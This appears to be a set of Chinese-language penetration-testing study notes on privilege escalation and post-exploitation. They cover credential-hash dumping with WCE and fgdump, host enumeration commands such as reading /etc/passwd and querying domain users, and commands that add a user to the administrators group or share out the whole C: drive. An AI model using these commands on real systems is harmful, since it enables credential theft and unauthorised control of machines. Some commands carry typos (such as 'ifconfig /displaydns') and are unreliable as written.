• 已实现本地低权限账号登录
• 远程溢出
• 直接获得账号密码
• 希望获取更好权限
• 实现对目标进一步控制
• 系统账号之间权限隔离
• 操作系统安全的基础
• 用户空间
• 内核空号
• 系统账号
• 用户账号登录时获取权限令牌
• 服务账号无需用户允许已在后台启动服务
• Windows
• user
• Administrator
• System
• Linux
• User
• Root
• Keylogger
• 木马窃取
• 密码窃取
• 下载地址:https://www.ampliasecurity.com/research/windows-credentials-editor/
WCE -l #查看用户密码hash值
wce -lv #查看详细信息
wce -d [LUID]
#从内存中删除一个用户
• 首先我们看系统有两个用户,现在我们把sbz改成administrator
• 通过下面命令去执行
• 从内存读取LM / NTLM hash
• 目前的操作系统无法使用,因内存有安全包,例如现在的操作使用wce -w,操作系统会崩溃,强制关机;
• 该工具在kali的目录为/usr/share/windows-binaries/fgdump
• 将其拷贝至windows下,直接双击,之后会生成三个文件
• 其中一个文件就包含hash值
/etc/resolv.conf #收集DNS信息
/etc/passwd #收集用户账号信息
whoami #查看当前用户
who -a #查看当前所有登录用户
ifconfig -a #查看当前IP地址
iptables -L -n #查看当前防火墙设置
netstat -rn #查看当前系统路由
uname -a #查看当前系统版本
ps aux #查看当前系统进程
dpkg -l | head #列出所有的安装软件包
ipconfig /all #查看所有网络信息
ifconfig /displaydns #查看dns缓存
netstat -bnao #查看程序进程
netstat -r #查看路由
net view / net view /domain #查看网络共享
net user /domain , net user %username% /domian #查看域信息
net accounts #查看账户信息
net share #查看共享
net localgroup administrators [usernmae] /add #将用户加入administrator组中
net group "[组名称]" /domian #查看组中的用户
net share name$=C:\ /unlimited #添加一个共享
net user [username] /active:yes /domian #将域中的用户给启用